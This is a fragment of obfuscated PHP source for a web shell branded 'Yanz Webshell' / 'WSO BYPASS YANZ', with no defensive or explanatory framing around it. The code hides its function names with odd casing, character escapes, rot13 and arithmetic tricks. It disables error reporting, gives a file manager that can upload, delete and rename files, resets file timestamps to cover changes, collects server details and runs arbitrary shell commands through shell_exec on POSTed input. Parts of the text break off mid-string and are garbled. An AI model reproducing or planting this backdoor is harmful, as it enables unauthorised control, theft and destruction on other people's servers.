hsh = "fa704e7366d666bd"; $this->_i = "_" . sUbSTr(mD5($_SERVER["HTTP_HOST"]), -056 - -0152 - 074, 075 + 0146 + -0240); $this->_taj = "#d\1465"; $this->_hej = "Windows-1251"; if (!@isset($_COOKIE[$this->_i]) || ($_COOKIE[$this->_i] != $this->hsh)) $this->SetcOoK($this->_i, $this->hsh); } function sTArTUP() { if (FUNCTION_exiSTS("ini_\x67et")) { $_vpb = @INI_geT("safe_mode"); $_cp = @INi_geT("disable_functions"); } if (!$_vpb && FUNCTion_ExiSts("error_r\145p\x6f\x72ting")) ERRoR_rePoRTINg((int)round(0 + 0)); if (!$_vpb && FUnCTIOn_ExIsTs("\163et_ti\155e_limit")) seT_tIME_limit((int)round(0 + 0)); if (fUNctIoN_eXiSTs("g\x65t_magic_\161uote\163\x5fg\160c") && fuNCTIon_ExIStS("ar\x72ay\137m\x61\x70") && fUNcTiOn_eXiSts("s\x74ripslas\x68es") && funCTion_exIstS("is_ar\162ay")) { if (@GeT_maGIC_quOtEs_gPC()) { function WSS($_a) { return @Is_arraY($_a) ? @ArRAY_MAp("WSS", $_a) : @STRIPslAshEs($_a); } $_POST = WSs($_POST); $_COOKIE = wss($_COOKIE); } } if (!FUnCtiON_EXIsts("posix_getpwuid") && (StrPOS($_cp, "\160osix_ge\164\160wuid") === false)) { function pOSiX_GeTpwUid($_l) { return false; } } if (!FUncTIoN_ExisTS("posix\137getgr\147id") && (StRPos($_cp, "p\157\x73ix_getgrgid") === false)) { function POsIx_GetgRgid($_l) { return false; } } if (StRtOlowER(suBSTr(PHP_OS, 01200 + -01200, (int)round(1.5 + 1.5))) == "win") $_vor = "w\151\156"; else $_vor = "nix"; $_wda = $_SERVER["\104O\x43UMENT_R\117OT"]; if (FUnctiOn_exIStS("getcwd")) $_zrt = @GeTcwD(); else $_zrt = @DIRname(__FILE__); if (isset($_POST["c"]) && $_POST["\143"] != "") $_POST["c"] = STR_ROt13($_POST["c"]); if (isset($_POST["c"])) { if (FunCTion_EXisTs("ch\x64ir")) @CHDir($_POST["c"]); } if (FuNCtION_eXiSTS("g\x65tcwd")) { $_za = @GeTcwd(); } elseif (@isset($_POST["c"]) && $_POST["c"] != "") $_za = $_POST["c"]; else $_za = $_zrt; if ($_vor == "w\151\156") { $_zrt = Str_REPlAcE("\134", "/", $_zrt); $_za = StR_rEplaCE("\134", "/", $_za); } if ($_za[Strlen($_za) - (0577 - -0621 - 01417)] != "/") $_za .= "/"; $this->_cp = $_cp; $this->_za = $_za; $this->_zrt = $_zrt; $this->_wda = $_wda; $this->_vpb = $_vpb; $this->_vor = $_vor; } function ActloGOuT() { $_i = $this->_i; SETCOokIE($_i, "", TimE() - (int)round(1800 + 1800)); die("bye!"); } function aCtFm() { $_za = $this->_za; if (!empty($_POST["p"])) { $_ozl = @FiLEMTIme($_POST["c"]); switch ($_POST["p"]) { case "uploadFil\145": if (!@MoVE_UPLOADeD_FIle($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) echo "Can'\x74 up\154\157ad file!"; elseif ($_ozl) @tOUcH($_FILES["\x66"]["name"], $_ozl, $_ozl); break; case "mk\144ir": if (!@mKDir(stR_roT13($_POST["x"]))) echo "Can't c\x72eate new dir"; elseif ($_ozl) @TOucH(StR_Rot13($_POST["\x78"]), $_ozl, $_ozl); break; case "delete": function DELETedIR($_we) { $_we = (suBStr($_we, -(int)round(0.5 + 0.5)) == "/") ? $_we : $_we . "/"; if ($_hcf = @oPEnDIR($_we)) { while (($_nos = @reaDDIr($_hcf)) !== false) { $_nos = $_we . $_nos; if ((@bAseName($_nos) == ".\x2e") || (@BASENAmE($_nos) == ".")) continue; $_ei = @fIletYPe($_nos); if ($_ei == "dir") DeLEtedIR($_nos); else @uNLink($_nos); } @CLOsedir($_hcf); } @RMdir($_we); } if (@Is_ARrAY($_POST["f"])) foreach ($_POST["f"] as $_rb) { if ($_rb == "..") continue; $_rb = STR_ROt13(URLdECodE($_rb)); if (@is_diR($_rb)) dElETEdIr($_rb); else @uNlInk($_rb); } break; } if ($_ozl) ToUcH($_POST["\143"], $_ozl, $_ozl); } echo "

File m\141\156age\x72

\x3cdiv class=con\164\145nt>\160_=\x78_=s_=\x22\042;"; $_wb = WsCanDir(@isset($_POST["c"]) ? $_POST["c"] : $_za); if ($_wb === false) { echo "Can\x27t\040\x6f\160en \164his folder!"; return; } global $_rpl; $_rpl = array("nam\x65", -0263 + -034 - -0320); if (!empty($_POST["p"])) { if (@pReg_matCH("!\x73_([A-\x7a]+)_(\x5cd{1}\051!", $_POST["p"], $_tf)) $_rpl = array($_tf[0402 + -0135 - 0244], (int)$_tf[0407 - 0405]); } echo ""; } } echo "
\x3ctex\164ar\x65a name=text clas\163\x3dbigarea>"; $_jj = @FOpeN($_POST["p"], "r"); if ($_jj) { while (!@fEOF($_jj)) echo HtmlsPECiaLchARs(@fgEts($_jj, (int)round(341.33333333333 + 341.33333333333 + 341.33333333333))); @FcLosE($_jj); } echo ""; if ($_ozl) @TOucH($_POST["p"], $_ozl, $_ozl); @CLEarSTATCachE(); break; case "\x72e\156ame": $_x = @fiLEmtIME($_POST["c"]); if (!empty($_POST["s"])) { if (!@rEnaME($_POST["p"], STR_Rot13($_POST["s"]))) echo "Can't rename!<\x62\162>"; else { if ($_x) @TOuCH($_POST["c"], $_x, $_x); die("";echo ""; if (FUncTIon_exISTs("\x64iskfr\145\x65space")) $_pn = @dISkfREEspAce($_za); if (FUnCTIOn_ExiSTs("disk_\x74\x6ft\141l_\x73pace")) $_ejl = @dISk_toTAL_SPACE($_za); $_ejl = $_ejl ? $_ejl : (int)round(0.5 + 0.5); if (fUncTiOn_eXISTs("php_\165name")) { $_v = @php_UnAME(); } elseif (funCTIon_ExiSTs("php\x69nfo")) { Ob_STArt(); PHpiNfO(); $_no = ob_Get_CLEAn(); if (false !== preG_mAtch("!System\134s*<\164d class=\042v\x22>([^\x5c<]\053)!i", $_no, $_bf)) $_v = tRIm($_bf[025 + 027 - 053]); } $_bl = ""; $_we = @exPLOdE("/", $_za); $_t = cOuNt($_we); for ($_o = (int)round(0 + 0); $_o < $_t - (01041 - 01040); $_o++) { $_bl .= "" . $_we[$_o] . "/"; } $_cw = array("UT\x46-8", "Windows-1251", "KO\1118-R", "KOI8-U", "cp866"); $_n = ""; foreach ($_cw as $_nos) $_n .= ""; $_fbd = array("\106\151les" => "fm"); if (!empty($_COOKIE[$_i])) $_fbd["Lo\147out"] = "Logout"; $_h = ""; foreach ($_fbd as $_gtq => $_e) $_h .= "\x5b <\141 href=\042#\x22\040on\143lick=\x22g('" . $_e . "',null,'','\x27,'')\042>" . $_gtq . " ][\040" . $_szx . " ] "; } $_uy = $_SERVER["SERVER_\x41\x44DR"]; if (empty($_uy)) { $_uy = GeThoSTbyName($_SERVER["SERVER\x5f\x4eA\115E"]); } echo "Attention:<\x2f\x66ont>Php\072
Hdd\x3a<\142r>Cwd:" . ($_vor == "\x77in" ? "
D\162i\x76es\072" : "") . "<\x2ftd\x3e" . "Yanz Webshell!\074/\141\x3e
" . ($_v ? subsTr($_v, -01 + 01, (int)round(40 + 40 + 40)) : "N/A") . "
" . @pHPversiON() . " S\141fe mode:
" . ($_vpb ? "ON<\057fon\164\x3e" : "\074f\157n\x74 color=gree\156>\074\142>OF\106") . " \074span>\104ateti\155e:\x3c/sp\141n>\040" . daTE("Y-m-d \x48:i:s") . "
" . ($_ejl ? vIewSIZe($_ejl) : "") . " F\x72ee:" . $_bl . " " . WPerMSCOLOr($_za) . "
[\x20root ] [ \150o\155\x65 ]\x3c/a>\074/span>\074/s\160an> \124ex\x74
" . $_dej . "\x3c/td\x3e" . "\x3cnobr>\x3csele\143t onchan\x67e=\042g(null,null\054" . (!empty($_POST["p"]) ? "'" . $_POST["p"] . "'" : "null") . ",null,nu\154l,t\x68is.v\141lue\x29\x22>" . $_n . "<\x2fo\x70tgroup><\x2f\163el\145\x63t>\074br>\x3c\163p\141n>\123e\162ver\x20IP:
" . $_uy . "
\074span>Cl\151ent I\x50:<\x62r>" . $_SERVER["REMOTE_ADDR"] . "" . "" . $_h . "<\057table>
_za; $_lia = @is_WrItabLe($_za) ? "\x20(Writeable)" : " \050Not writable\x29<\057font\076"; echo "<\164r>
<\x74d\076R\145ad fil\x65:<\142r><\151nput class='t\x6folsInp\x27 type\075tex\164\x20\156ame\075\146><\x69nput \x74ype=submit \x76alue='>>\x27\x3e<\x2f\x74r><\164d><\146orm metho\x64\075'po\x73t' ENCTYPE='m\165ltipar\164/form\x2dd\141ta'><\151nput typ\x65=\150idden name=a value='fm'\x3e\074input \164ype=hidden n\x61me=c val\x75e='" . sTr_RoT13($_za) . "\047>\x3c\x73pa\x6e\x3e\125pload\040file:" . $_lia . "\074br>>'><\x62r \040\076<\x2ftd>\x3c/\164able>
\074/html>"; } } function vIewSIze($_xwm, $_yj = null) { if (iS_INt($_xwm)) $_xwm = @spRINtf("%\165", $_xwm); if ($_xwm >= (int)round(357913941.33333 + 357913941.33333 + 357913941.33333)) return @spRINtf("%1.2f", $_xwm / (010000001240 + -01240)) . " GB"; elseif ($_xwm >= (03777073 - 04000560 + 04001465)) return @SprinTF("%\061.2f", $_xwm / (int)round(349525.33333333 + 349525.33333333 + 349525.33333333)) . " MB"; elseif ($_xwm >= (int)round(512 + 512)) return @sPRinTf("%1\x2e\062f", $_xwm / (int)round(341.33333333333 + 341.33333333333 + 341.33333333333)) . " KB"; else return $_xwm . " B"; } function WPerMs($_l) { if (($_l & (0140371 - 0137733 + 0137342)) == (0137615 - -0163)) $_o = "s"; elseif (($_l & (int)round(20480 + 20480)) == (0117774 - -04)) $_o = "l"; elseif (($_l & (int)round(10922.666666667 + 10922.666666667 + 10922.666666667)) == (0100270 + -0270)) $_o = "-"; elseif (($_l & (int)round(8192 + 8192 + 8192)) == (int)round(12288 + 12288)) $_o = "\142"; elseif (($_l & (int)round(8192 + 8192)) == (037655 - 040121 - -040244)) $_o = "d"; elseif (($_l & (int)round(2730.6666666667 + 2730.6666666667 + 2730.6666666667)) == (017574 + 0204)) $_o = "c"; elseif (($_l & (int)round(1365.3333333333 + 1365.3333333333 + 1365.3333333333)) == (010110 + -0110)) $_o = "\160"; else $_o = "u"; $_o .= (($_l & (0752 + 044 - 0416)) ? "r" : "-"); $_o .= (($_l & (int)round(42.666666666667 + 42.666666666667 + 42.666666666667)) ? "w" : "-"); $_o .= (($_l & (-01223 - -01323)) ? (($_l & (int)round(682.66666666667 + 682.66666666667 + 682.66666666667)) ? "s" : "x") : (($_l & (05014 + 04725 + -05741)) ? "S" : "-")); $_o .= (($_l & (-01044 - -01104)) ? "r" : "-"); $_o .= (($_l & (020 + 022 - 022)) ? "w" : "\055"); $_o .= (($_l & (int)round(2.6666666666667 + 2.6666666666667 + 2.6666666666667)) ? (($_l & (01564 + 01365 + -01151)) ? "s" : "x") : (($_l & (int)round(512 + 512)) ? "\x53" : "-")); $_o .= (($_l & (int)round(1.3333333333333 + 1.3333333333333 + 1.3333333333333)) ? "r" : "-"); $_o .= (($_l & (int)round(0.66666666666667 + 0.66666666666667 + 0.66666666666667)) ? "w" : "-");$_o .= (($_l & (0106 - 0105)) ? (($_l & (int)round(170.66666666667 + 170.66666666667 + 170.66666666667)) ? "t" : "x") : (($_l & (0765 + 0470 - 0455)) ? "\x54" : "-")); return $_o; } function wpERmsCOlor($_rb) { if (!@is_rEAdaBLE($_rb)) return ""; elseif (!@iS_WRItabLE($_rb)) return ""; else return "" . wpeRmS(FiLepERmS($_rb)) . ""; } function wScanDIR($_pa, $_u = "uvxf") { if (funCTion_exISTs("scandir")) { return @ScAnDIr($_pa); } else { if ($_hcf = @oPENDIr($_pa)) { while (false !== ($_nm = @reAdDIR($_hcf))) $_vgl[] = $_nm; @ClOseDIr($_hcf); } return $_vgl; } } $_tcn = new _pps(); $_tcn->AFTErlOGin(); $_tcn->STaRtup(); if (@isset($_POST["a"])) { switch ($_POST["\x61"]) { case "fm": $_tcn->WheADer(); $_tcn->acTfm(); $_tcn->wfOoter(); break; case "ft": if (@isset($_POST["x"]) && $_POST["x"] == "\x64ownl\x6f\141d") { $_tcn->aCtFT(); } else { $_tcn->wHeADeR(); $_tcn->aCTFT(); $_tcn->wfoOteR(); } break; case "\x73\x72": $_tcn->WhEAdEr(); $_tcn->aCtSr(); $_tcn->wfOOTer(); break; case "Logout": $_tcn->actLoGoUT(); break; default: $_tcn->WHeaDer(); $_tcn->ActfM(); $_tcn->WFOOtEr(); break; } } elseif (!@isset($_POST["\x61"])) { $_tcn->WHeAdER(); $_tcn->AcTfm(); $_tcn->WfOOTER(); if (isset($_POST['subcmd'])) { echo "
";
        $input = $_POST['command'];
        $output = shell_exec($input);
        echo "






































































"; echo "
WSO BYPASS YANZ!
"; echo "
"; echo '$WSOYanZ: '; echo $output; echo "
"; exit; } }; ?>
<\x66orm onsubmit='g(null,rot13(\164his\x2ec\056value\051,\042\042)\x3breturn\040false\073'>\074spa\x6e>Change di\162\072<\142r><\151nput\x20clas\x73='toolsInp' \164yp\145=tex\x74 name=\143 value='" . HtMlSpeCiaLcHArS($_za) . "'>\x3c/for\155\076
\074form \x6fn\x73ub\x6dit=\x22g('f\x6d\x27,nul\x6c,'m\x6b\x64ir',rot13(this.\x64.value));r\145\164urn fal\x73e;\x22>" . $_lia . "
\074input \x63la\x73s='t\157ol\x73Inp' type=text n\x61\x6de\x3d\x64>\x3ci\x6eput\x20type=submit val\165e='>>'\076<\057td>
Make f\x69l\145:" . $_lia . "<\x69nput cl\x61ss='\164oolsInp' type=t\x65\x78t name\075f\x3e>'>\x3c/tr>
Terminal: